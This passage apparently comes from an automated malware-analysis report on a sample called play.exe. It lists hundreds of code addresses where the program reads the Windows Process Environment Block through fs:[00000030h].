Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269208A mov eax, dword ptr fs:[00000030h]	0_2_0269208A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h]	0_2_02764164
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h]	0_2_02764164
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02728158 mov eax, dword ptr fs:[00000030h]	0_2_02728158
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov ecx, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h]	0_2_02696154
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h]	0_2_02696154
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C156 mov eax, dword ptr fs:[00000030h]	0_2_0268C156
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0124 mov eax, dword ptr fs:[00000030h]	0_2_026C0124
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02750115 mov eax, dword ptr fs:[00000030h]	0_2_02750115
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov ecx, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027661E5 mov eax, dword ptr fs:[00000030h]	0_2_027661E5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C01F8 mov eax, dword ptr fs:[00000030h]	0_2_026C01F8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov ecx, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h]	0_2_027561C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h]	0_2_027561C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D0185 mov eax, dword ptr fs:[00000030h]	0_2_026D0185
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h]	0_2_02734180
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h]	0_2_02734180
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h]	0_2_0274C188
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h]	0_2_0274C188
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h]	0_2_026CA660
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h]	0_2_026CA660
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C2674 mov eax, dword ptr fs:[00000030h]	0_2_026C2674
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h]	0_2_0275866E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h]	0_2_0275866E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AC640 mov eax, dword ptr fs:[00000030h]	0_2_026AC640
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269262C mov eax, dword ptr fs:[00000030h]	0_2_0269262C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C6620 mov eax, dword ptr fs:[00000030h]	0_2_026C6620
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8620 mov eax, dword ptr fs:[00000030h]	0_2_026C8620
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE627 mov eax, dword ptr fs:[00000030h]	0_2_026AE627
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2619 mov eax, dword ptr fs:[00000030h]	0_2_026D2619
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E609 mov eax, dword ptr fs:[00000030h]	0_2_0270E609
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h]	0_2_027106F1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h]	0_2_027106F1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA6C7 mov ebx, dword ptr fs:[00000030h]	0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA6C7 mov eax, dword ptr fs:[00000030h]	0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC6A6 mov eax, dword ptr fs:[00000030h]	0_2_026CC6A6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C66B0 mov eax, dword ptr fs:[00000030h]	0_2_026C66B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h]	0_2_02694690
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h]	0_2_02694690
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698770 mov eax, dword ptr fs:[00000030h]	0_2_02698770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov esi, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714755 mov eax, dword ptr fs:[00000030h]	0_2_02714755
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E75D mov eax, dword ptr fs:[00000030h]	0_2_0271E75D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690750 mov eax, dword ptr fs:[00000030h]	0_2_02690750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h]	0_2_026D2750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h]	0_2_026D2750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270C730 mov eax, dword ptr fs:[00000030h]	0_2_0270C730
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h]	0_2_026CC720
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h]	0_2_026CC720
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov ecx, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC700 mov eax, dword ptr fs:[00000030h]	0_2_026CC700
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690710 mov eax, dword ptr fs:[00000030h]	0_2_02690710
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0710 mov eax, dword ptr fs:[00000030h]	0_2_026C0710
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E7E1 mov eax, dword ptr fs:[00000030h]	0_2_0271E7E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h]	0_2_026947FB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h]	0_2_026947FB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269C7C0 mov eax, dword ptr fs:[00000030h]	0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027107C3 mov eax, dword ptr fs:[00000030h]	0_2_027107C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026907AF mov eax, dword ptr fs:[00000030h]	0_2_026907AF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027447A0 mov eax, dword ptr fs:[00000030h]	0_2_027447A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273678E mov eax, dword ptr fs:[00000030h]	0_2_0273678E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C460 mov ecx, dword ptr fs:[00000030h]	0_2_0271C460
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h]	0_2_0268847D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h]	0_2_0268847D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A456 mov eax, dword ptr fs:[00000030h]	0_2_0274A456
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B245A mov eax, dword ptr fs:[00000030h]	0_2_026B245A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268645D mov eax, dword ptr fs:[00000030h]	0_2_0268645D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C427 mov eax, dword ptr fs:[00000030h]	0_2_0268C427
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026904E5 mov ecx, dword ptr fs:[00000030h]	0_2_026904E5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271A4B0 mov eax, dword ptr fs:[00000030h]	0_2_0271A4B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026964AB mov eax, dword ptr fs:[00000030h]	0_2_026964AB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C44B0 mov ecx, dword ptr fs:[00000030h]	0_2_026C44B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A49A mov eax, dword ptr fs:[00000030h]	0_2_0274A49A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698550 mov eax, dword ptr fs:[00000030h]	0_2_02698550
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698550 mov eax, dword ptr fs:[00000030h]	0_2_02698550
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726500 mov eax, dword ptr fs:[00000030h]	0_2_02726500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC5ED mov eax, dword ptr fs:[00000030h]	0_2_026CC5ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC5ED mov eax, dword ptr fs:[00000030h]	0_2_026CC5ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026925E0 mov eax, dword ptr fs:[00000030h]	0_2_026925E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE5CF mov eax, dword ptr fs:[00000030h]	0_2_026CE5CF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE5CF mov eax, dword ptr fs:[00000030h]	0_2_026CE5CF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026965D0 mov eax, dword ptr fs:[00000030h]	0_2_026965D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA5D0 mov eax, dword ptr fs:[00000030h]	0_2_026CA5D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA5D0 mov eax, dword ptr fs:[00000030h]	0_2_026CA5D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B45B1 mov eax, dword ptr fs:[00000030h]	0_2_026B45B1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B45B1 mov eax, dword ptr fs:[00000030h]	0_2_026B45B1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4588 mov eax, dword ptr fs:[00000030h]	0_2_026C4588
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692582 mov eax, dword ptr fs:[00000030h]	0_2_02692582
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692582 mov ecx, dword ptr fs:[00000030h]	0_2_02692582
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE59C mov eax, dword ptr fs:[00000030h]	0_2_026CE59C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270CA72 mov eax, dword ptr fs:[00000030h]	0_2_0270CA72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270CA72 mov eax, dword ptr fs:[00000030h]	0_2_0270CA72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EA60 mov eax, dword ptr fs:[00000030h]	0_2_0273EA60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0A5B mov eax, dword ptr fs:[00000030h]	0_2_026A0A5B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0A5B mov eax, dword ptr fs:[00000030h]	0_2_026A0A5B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEA2E mov eax, dword ptr fs:[00000030h]	0_2_026BEA2E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA24 mov eax, dword ptr fs:[00000030h]	0_2_026CCA24
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B4A35 mov eax, dword ptr fs:[00000030h]	0_2_026B4A35
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B4A35 mov eax, dword ptr fs:[00000030h]	0_2_026B4A35
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271CA11 mov eax, dword ptr fs:[00000030h]	0_2_0271CA11
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CAAEE mov eax, dword ptr fs:[00000030h]	0_2_026CAAEE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CAAEE mov eax, dword ptr fs:[00000030h]	0_2_026CAAEE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690AD0 mov eax, dword ptr fs:[00000030h]	0_2_02690AD0
